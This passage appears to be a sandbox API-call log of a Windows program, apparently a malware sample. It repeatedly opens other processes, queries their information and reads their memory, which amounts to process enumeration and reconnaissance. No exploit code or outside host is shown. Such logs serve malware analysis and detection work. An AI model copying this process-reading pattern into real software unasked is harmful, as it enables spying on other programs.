[0413.557] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.557] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.557] malloc (_Size=0x60) returned 0x2c0790
[0413.557] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b2740, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.558] free (_Block=0x2c0790)
[0413.558] CloseHandle (hObject=0x24c) returned 1
[0413.559] _ui64tow (_Value=0x6e8, _Buffer="1364", _Radix=10) returned="1768"
[0413.563] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1768") returned 4
[0413.565] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.565] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.590] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e8) returned 0x24c
[0413.590] GetLastError () returned 0x0
[0413.590] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.591] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.591] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.591] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1028d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.591] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1026de, lpBuffer=0x12dd100, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.592] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.593] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.593] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.593] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x101ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.593] malloc (_Size=0x5a) returned 0x2c0790
[0413.593] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x102730, lpBuffer=0x2c0790, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0413.594] free (_Block=0x2c0790)
[0413.594] CloseHandle (hObject=0x24c) returned 1
[0413.595] _ui64tow (_Value=0x888, _Buffer="1768", _Radix=10) returned="2184"
[0413.599] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2184") returned 4
[0413.600] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.600] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x888) returned 0x24c
[0413.622] GetLastError () returned 0x0
[0413.622] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.622] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.622] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.622] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x352980, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.622] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x352702, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.623] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.624] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.624] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.625] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x351ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.625] malloc (_Size=0x8a) returned 0x2e1a70
[0413.625] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x352784, lpBuffer=0x2e1a70, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1a70*, lpNumberOfBytesRead=0x0) returned 1
[0413.625] free (_Block=0x2e1a70)
[0413.626] CloseHandle (hObject=0x24c) returned 1
[0413.627] _ui64tow (_Value=0x644, _Buffer="2184", _Radix=10) returned="1604"
[0413.632] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1604") returned 4
[0413.633] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.633] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x24c
[0413.689] GetLastError () returned 0x0
[0413.689] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.689] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.689] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.689] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x92910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.690] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x926ee, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.691] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.692] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.692] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.692] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x91ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.700] malloc (_Size=0x6c) returned 0x2c1680
[0413.700] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x92752, lpBuffer=0x2c1680, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.700] free (_Block=0x2c1680)
[0413.701] CloseHandle (hObject=0x24c) returned 1
[0413.702] _ui64tow (_Value=0x360, _Buffer="1604", _Radix=10) returned="864"
[0413.706] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="864") returned 3
[0413.708] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.708] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.733] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x360) returned 0x24c
[0413.733] GetLastError () returned 0x0
[0413.733] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.733] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.733] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.733] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x122910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.733] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1226f0, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.735] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.735] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.736] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.736] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x121ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.736] malloc (_Size=0x6c) returned 0x2c1680
[0413.736] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x122754, lpBuffer=0x2c1680, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.736] free (_Block=0x2c1680)
[0413.737] CloseHandle (hObject=0x24c) returned 1
[0413.738] _ui64tow (_Value=0x8a8, _Buffer="864", _Radix=10) returned="2216"
[0413.751] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2216") returned 4
[0413.752] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.752] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.780] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a8) returned 0x24c
[0413.780] GetLastError () returned 0x0
[0413.780] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.780] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x252930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.781] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2526ea, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.782] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.783] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.784] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.784] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.784] malloc (_Size=0x78) returned 0x2c1300
[0413.784] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x25275a, lpBuffer=0x2c1300, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0413.784] free (_Block=0x2c1300)
[0413.785] CloseHandle (hObject=0x24c) returned 1
[0413.786] _ui64tow (_Value=0x8b4, _Buffer="2216", _Radix=10) returned="2228"
[0413.791] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2228") returned 4
[0413.792] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.792] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.815] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x24c
[0413.815] GetLastError () returned 0x0
[0413.816] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.816] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.816] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.816] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.816] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c26ea, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.819] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.821] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.821] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.821] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.821] malloc (_Size=0x62) returned 0x2c0720
[0413.821] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c2744, lpBuffer=0x2c0720, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0413.821] free (_Block=0x2c0720)
[0413.822] CloseHandle (hObject=0x24c) returned 1
[0413.823] _ui64tow (_Value=0x8ec, _Buffer="2228", _Radix=10) returned="2284"
[0413.828] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2284") returned 4
[0413.829] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.829] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.851] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x24c
[0413.851] GetLastError () returned 0x0
[0413.851] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.851] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.851] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.852] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b2940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.852] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b26f6, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.853] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.854] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.854] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.854] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.855] malloc (_Size=0x78) returned 0x2c1300
[0413.855] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b2766, lpBuffer=0x2c1300, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0413.855] free (_Block=0x2c1300)
[0413.855] CloseHandle (hObject=0x24c) returned 1
[0413.856] _ui64tow (_Value=0x918, _Buffer="2284", _Radix=10) returned="2328"
[0413.861] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2328") returned 4
[0413.862] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.862] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.898] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x918) returned 0x24c
[0413.898] GetLastError () returned 0x0
[0413.898] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.898] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.899] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.899] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1029e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.899] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1027a0, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.900] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.901] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.901] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
